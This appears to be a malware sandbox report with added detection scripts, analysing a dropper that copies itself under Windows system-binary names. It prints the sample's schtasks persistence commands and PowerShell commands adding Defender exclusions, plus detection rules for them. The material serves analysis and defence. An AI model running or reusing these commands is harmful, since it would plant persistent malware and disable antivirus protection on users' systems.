schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Documents\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\cmd.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\providercommon\RuntimeBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\providercommon\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\providercommon\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Portable Devices\spoolsv.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Portable Devices\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 10 /tr "'C:\Windows\GameBarPresenceWriter\Idle.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Windows\GameBarPresenceWriter\Idle.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'C:\Windows\GameBarPresenceWriter\Idle.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\Windows\Sun\fontdrvhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\Sun\fontdrvhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 12 /tr "'C:\Windows\Sun\fontdrvhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Portable Devices\sppsvc.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\sppsvc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Portable Devices\sppsvc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\3D Objects\services.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\Admin\3D Objects\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\3D Objects\services.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Multimedia Platform\unsecapp.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Templates\unsecapp.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Mozilla Maintenance Service\services.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\conhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\RuntimeBroker.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\conhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\cmd.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\RuntimeBroker.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Portable Devices\spoolsv.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\GameBarPresenceWriter\Idle.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Sun\fontdrvhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Portable Devices\sppsvc.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\3D Objects\services.exe'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ERyp2GSBQs.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Admin\3D Objects\services.exe
"C:\Users\Admin\3D Objects\services.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\2pbp0wsTa1.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Admin\3D Objects\services.exe
"C:\Users\Admin\3D Objects\services.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\8YXrskW4JY.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Admin\3D Objects\services.exe
"C:\Users\Admin\3D Objects\services.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\KOC6cu7vKW.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Admin\3D Objects\services.exe
"C:\Users\Admin\3D Objects\services.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SNnEytbzjv.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Admin\3D Objects\services.exe
"C:\Users\Admin\3D Objects\services.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SNnEytbzjv.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Admin\3D Objects\services.exe
"C:\Users\Admin\3D Objects\services.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\jBrSCX6wbi.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Admin\3D Objects\services.exe
"C:\Users\Admin\3D Objects\services.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\l7tVtcAquU.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Admin\3D Objects\services.exe
"C:\Users\Admin\3D Objects\services.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\jBrSCX6wbi.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Admin\3D Objects\services.exe
"C:\Users\Admin\3D Objects\services.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\l7tVtcAquU.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Admin\3D Objects\services.exe
"C:\Users\Admin\3D Objects\services.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\KOC6cu7vKW.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Admin\3D Objects\services.exe
"C:\Users\Admin\3D Objects\services.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\yoQf8QHV2Q.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Admin\3D Objects\services.exe
"C:\Users\Admin\3D Objects\services.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Bf5uratM3O.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Admin\3D Objects\services.exe
"C:\Users\Admin\3D Objects\services.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\svzewrKVsp.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
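The process list above is the whole persistence routine in one place: DllCommonsvc.exe drops copies of itself under names of real Windows binaries (services.exe, unsecapp.exe, spoolsv.exe, RuntimeBroker.exe, conhost.exe, fontdrvhost.exe, sppsvc.exe, cmd.exe) into Program Files, user profile and Recovery paths, registers three scheduled tasks per copy (two MINUTE tasks and one ONLOGON task, two of them with /rl HIGHEST, the task name being the file stem with its first character appended, e.g. "unsecappu", "servicess", "RuntimeBrokerR"), adds a Defender exclusion for each path, and the .bat stages call w32tm against localhost before relaunching services.exe. The report's own signature also records that the schtasks.exe children were spawned by wmiprvse.exe rather than by the dropper. The script below is an added example, not part of the sandbox report, that turns those observations into rules and runs them over process-creation records constructed from the command lines on this page. The wmiprvse.exe parent for the schtasks.exe records is taken from the signature table; the parents of the powershell.exe and w32tm.exe records, the benign control record, and the rule names are assumptions, and reading the w32tm stripchart call as a delay is an inference, not something the report states.

```python
"""Offline triage of process-creation records for the DCRat persistence pattern.
Added example; the rules and sample records are built from the command lines in
the report, not taken from the sandbox or from the malware."""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import List, Optional, Tuple

# Binaries that normally exist only under the Windows system directories; the
# dropper writes copies under Program Files, the user profile and C:\Recovery.
SYSTEM_BINARIES = {"services.exe", "spoolsv.exe", "sppsvc.exe", "unsecapp.exe",
                   "conhost.exe", "runtimebroker.exe", "cmd.exe", "fontdrvhost.exe"}
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows\winsxs")
# From the report's signature: wmiprvse.exe is not an expected parent of schtasks.exe.
UNEXPECTED_PARENTS = {"wmiprvse.exe"}
SCRIPTING_CHILDREN = {"schtasks.exe", "cmd.exe", "powershell.exe", "wscript.exe"}

TN_RE = re.compile(r'/tn\s+"([^"]+)"', re.I)
TR_RE = re.compile(r'''/tr\s+"'?([^"']+)'?"''', re.I)   # handles /tr "'path'" and /tr "path"
RL_RE = re.compile(r"/rl\s+(\w+)", re.I)
EXCL_RE = re.compile(r"Add-MpPreference\s+-ExclusionPath\s+'([^']+)'", re.I)


@dataclass
class ProcEvent:
    parent: Optional[str]   # parent image path; None when the source does not record it
    image: str
    cmdline: str


def _base(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def outside_system_dirs(path: str) -> bool:
    return not path.lower().startswith(SYSTEM_DIRS)


def analyse(ev: ProcEvent) -> List[str]:
    """Return the names of the rules that fire for one process-creation record."""
    hits: List[str] = []
    child, cl = _base(ev.image), ev.cmdline

    # Rule 1: a task-creation or scripting child under a parent that should never spawn it.
    if ev.parent and _base(ev.parent) in UNEXPECTED_PARENTS and child in SCRIPTING_CHILDREN:
        hits.append(f"unexpected_parent:{_base(ev.parent)}->{child}")

    # Rule 2: schtasks /create whose target carries a system-binary name outside the
    # system directories, the stem+first-character task name seen in this report,
    # and tasks requested at the highest run level.
    if child == "schtasks.exe" and "/create" in cl.lower():
        tn, tr, rl = TN_RE.search(cl), TR_RE.search(cl), RL_RE.search(cl)
        if tr:
            target = tr.group(1)
            name, stem = _base(target), PureWindowsPath(target).stem
            if name in SYSTEM_BINARIES and outside_system_dirs(target):
                hits.append(f"masquerade:{name} at {target}")
            if tn and tn.group(1).lower() == (stem + stem[0]).lower():
                hits.append(f"dcrat_task_name:{tn.group(1)}")
        if rl and rl.group(1).upper() == "HIGHEST":
            hits.append("task_rl_highest")

    # Rule 3: a Defender path exclusion added from the command line.
    m = EXCL_RE.search(cl)
    if m:
        hits.append(f"defender_exclusion:{m.group(1)}")

    # Rule 4: w32tm stripchart against localhost, which the .bat stages run before
    # relaunching the payload (read here as a delay primitive; an inference).
    if child == "w32tm.exe" and "/stripchart" in cl and "/computer:localhost" in cl:
        hits.append("w32tm_localhost_stripchart")
    return hits


def triage(events: List[ProcEvent]) -> List[Tuple[int, List[str]]]:
    """(index, hits) for every record that fired at least one rule."""
    out = []
    for i, ev in enumerate(events):
        hits = analyse(ev)
        if hits:
            out.append((i, hits))
    return out


# Constructed records. Command lines are copied from the report's process list; the
# wmiprvse.exe parent is the report's signature, the other parents are assumptions,
# and the final record is an assumed benign scheduled task used as a control.
WMI = r"C:\Windows\system32\wbem\wmiprvse.exe"
SCHTASKS = r"C:\Windows\system32\schtasks.exe"
SAMPLE_EVENTS = [
    ProcEvent(WMI, SCHTASKS, r'''schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\unsecapp.exe'" /f'''),
    ProcEvent(WMI, SCHTASKS, r'''schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\Admin\3D Objects\services.exe'" /rl HIGHEST /f'''),
    ProcEvent(WMI, SCHTASKS, r'''schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\providercommon\RuntimeBroker.exe'" /f'''),
    ProcEvent(r"C:\providercommon\DllCommonsvc.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"powershell" -Command Add-MpPreference -ExclusionPath ' + r"'C:\providercommon\DllCommonsvc.exe'"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\system32\w32tm.exe",
              "w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2"),
    ProcEvent(r"C:\Windows\explorer.exe", SCHTASKS, r'''schtasks.exe /create /tn "NightlyBackup" /sc DAILY /st 02:00 /tr "C:\Tools\backup.exe" /f'''),
]

if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx].cmdline[:60], "->", hits)
```

Rule 2 is the one worth keeping in a production detection: a scheduled task whose action is a file called services.exe, spoolsv.exe, conhost.exe or RuntimeBroker.exe anywhere but System32/SysWOW64 has no legitimate explanation, and the name-plus-first-character convention is specific enough to catch this builder's output even when the dropped paths change. Rule 1 depends on the sensor recording the real parent (Sysmon event 1 or the sandbox's own tree); Rule 3 also fires on legitimate administrators, so treat it as a correlation signal rather than an alert on its own.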
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.130.81.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
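The network table mixes three kinds of rows: PTR queries (the in-addr.arpa names), one A lookup, and repeated TLS sessions to raw.githubusercontent.com, which is the "legitimate hosting services abused for malware hosting/C2" signature from the summary. The script below is an added example, not part of the report, that parses the table, reverses the in-addr.arpa labels back into the addresses that were looked up, and cross-references them with the addresses actually contacted over TCP. The ABUSED_HOSTING watchlist is an assumption for this example; the rows are copied from the table above. Many of the reversed PTR targets can be Windows background traffic rather than the sample's own activity, so treat them as context, not as indicators.

```python
import re
from collections import Counter

# Constructed input: the Network table from the behavioral1 report above.
NETWORK_TABLE = """\
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.130.81.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
"""

# Assumed watchlist of public hosting domains commonly abused for payload
# staging or C2; extend it for your environment.
ABUSED_HOSTING = {"raw.githubusercontent.com", "pastebin.com", "cdn.discordapp.com"}

PTR_RE = re.compile(r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.in-addr\.arpa$", re.I)


def ptr_to_ip(domain: str):
    """Reverse an in-addr.arpa label back to the IPv4 address it asks about."""
    m = PTR_RE.match(domain.strip())
    return ".".join(reversed(m.groups())) if m else None


def parse_rows(table: str):
    rows = []
    for line in table.splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 4:
            continue
        country, dest, domain, proto = cells
        ip, _, port = dest.rpartition(":")
        try:
            port = int(port)        # skips the header row
        except ValueError:
            continue
        rows.append({"country": country, "ip": ip, "port": port,
                     "domain": domain, "proto": proto.lower()})
    return rows


def summarize(rows):
    tcp = Counter((r["ip"], r["port"], r["domain"]) for r in rows if r["proto"] == "tcp")
    ptr_targets = sorted({ip for r in rows if (ip := ptr_to_ip(r["domain"]))})
    contacted = {r["ip"] for r in rows if r["proto"] == "tcp"}
    return {
        "tcp_sessions": tcp,
        "ptr_targets": ptr_targets,
        # PTR lookups for an address the sample also connected to: the sample
        # (or the OS on its behalf) resolved the name of its own peer.
        "ptr_for_contacted": sorted(set(ptr_targets) & contacted),
        "abused_hosting": sorted({r["domain"] for r in rows
                                  if r["domain"].lower() in ABUSED_HOSTING}),
    }


if __name__ == "__main__":
    s = summarize(parse_rows(NETWORK_TABLE))
    for key, count in s["tcp_sessions"].items():
        print(f"{count:3} x TCP {key}")
    print("PTR targets:", ", ".join(s["ptr_targets"]))
    print("PTR for contacted peers:", s["ptr_for_contacted"])
    print("Abused hosting:", s["abused_hosting"])
```

The useful output here is the single destination, 185.199.111.133:443, opened thirteen times: that is the sample polling a raw GitHub URL repeatedly, not a one-off download. Block or alert on the domain only if your environment does not rely on raw.githubusercontent.com for legitimate tooling; otherwise pivot on the process making the connection, which in this report is the masquerading services.exe rather than a browser or package manager.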
Files
C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe
| MD5 | 8088241160261560a02c84025d107592 |
| SHA1 | 083121f7027557570994c9fc211df61730455bb5 |
| SHA256 | 2072cc9a4a3b84d4c5178ab41c5588eea7d0103e3928e34d64f17bf97f3d1cc1 |
| SHA512 | 20d9369dd359315848ea30144383a0bb479d86059fdbc3b3256ac84f998193512feb3b1799ab663619920c99fe7e0ebba33ada31a3855094b956fcd351c90478 |
C:\providercommon\1zu9dW.bat
| MD5 | 6783c3ee07c7d151ceac57f1f9c8bed7 |
| SHA1 | 17468f98f95bf504cc1f83c49e49a78526b3ea03 |
| SHA256 | 8ab782f0f327a2021530e7230d3aee8abbecb7eed59482a3a46e78b9e3862322 |
| SHA512 | c6012d4bfac1ed14d0fd9f0eabd0e1c3d647b343db292a907b246271d52a4b7469c809db43910ddba2e8c5045f9cb3d24d0af62d363281e6cb8b39ee94a183e8 |
C:\providercommon\DllCommonsvc.exe
| MD5 | bd31e94b4143c4ce49c17d3af46bcad0 |
| SHA1 | f8c51ff3ff909531d9469d4ba1bbabae101853ff |
| SHA256 | b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63 |
| SHA512 | f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394 |
memory/2876-12-0x00007FFE22BE3000-0x00007FFE22BE5000-memory.dmp
memory/2876-13-0x0000000000FC0000-0x00000000010D0000-memory.dmp
memory/2876-14-0x00000000031F0000-0x0000000003202000-memory.dmp
memory/2876-15-0x0000000003220000-0x000000000322C000-memory.dmp
memory/2876-16-0x0000000003200000-0x000000000320C000-memory.dmp
memory/2876-17-0x0000000003210000-0x000000000321C000-memory.dmp
memory/1004-54-0x000001347C0F0000-0x000001347C112000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ywytkizz.1a3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\ERyp2GSBQs.bat
| MD5 | fde6f674c630feb99022e20ae55a38f4 |
| SHA1 | 45a6aef2257599813af634a3805dc05fdaffe003 |
| SHA256 | e16ae5496a3c6bb2a967d375039197ef7c11225768136e0a5ed047c204a06774 |
| SHA512 | 900892de6637acae27f0c20e37bafbec728e99665389f92f72a1f594fe57c489e18475cc1f0265f669909a9897ebe4e3b7aa6733f49e049e314a486458bb3164 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d28a889fd956d5cb3accfbaf1143eb6f |
| SHA1 | 157ba54b365341f8ff06707d996b3635da8446f7 |
| SHA256 | 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45 |
| SHA512 | 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cadef9abd087803c630df65264a6c81c |
| SHA1 | babbf3636c347c8727c35f3eef2ee643dbcc4bd2 |
| SHA256 | cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438 |
| SHA512 | 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3a6bad9528f8e23fb5c77fbd81fa28e8 |
| SHA1 | f127317c3bc6407f536c0f0600dcbcf1aabfba36 |
| SHA256 | 986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05 |
| SHA512 | 846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2e907f77659a6601fcc408274894da2e |
| SHA1 | 9f5b72abef1cd7145bf37547cdb1b9254b4efe9d |
| SHA256 | 385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233 |
| SHA512 | 34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5f0ddc7f3691c81ee14d17b419ba220d |
| SHA1 | f0ef5fde8bab9d17c0b47137e014c91be888ee53 |
| SHA256 | a31805264b8b13ce4145f272cb2830728c186c46e314b48514d636866217add5 |
| SHA512 | 2ce7c2a0833f581297c13dd88ccfcd36bf129d2b5d7718c52b1d67c97cbd8fc93abc085a040229a0fd712e880c690de7f6b996b0b47c46a091fabb7931be58d3 |
C:\Users\Admin\AppData\Local\Temp\2pbp0wsTa1.bat
| MD5 | 7382a16f94e535fd99c8e821256256dc |
| SHA1 | a436d220b90dcd71a926e8c4e88a9a788705fa03 |
| SHA256 | fd95164c9f9db5ceea82200c5c94919df90c0167b22002b215edfa81876c9d39 |
| SHA512 | 026f66353347c56d189aa929445952b78aa928b0fbaf04064ea0c3bca98271bebb7388bed1fdf70532aadf070ea223e91c463484b6fdd840acfd03fbd8607502 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\services.exe.log
| MD5 | baf55b95da4a601229647f25dad12878 |
| SHA1 | abc16954ebfd213733c4493fc1910164d825cac8 |
| SHA256 | ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924 |
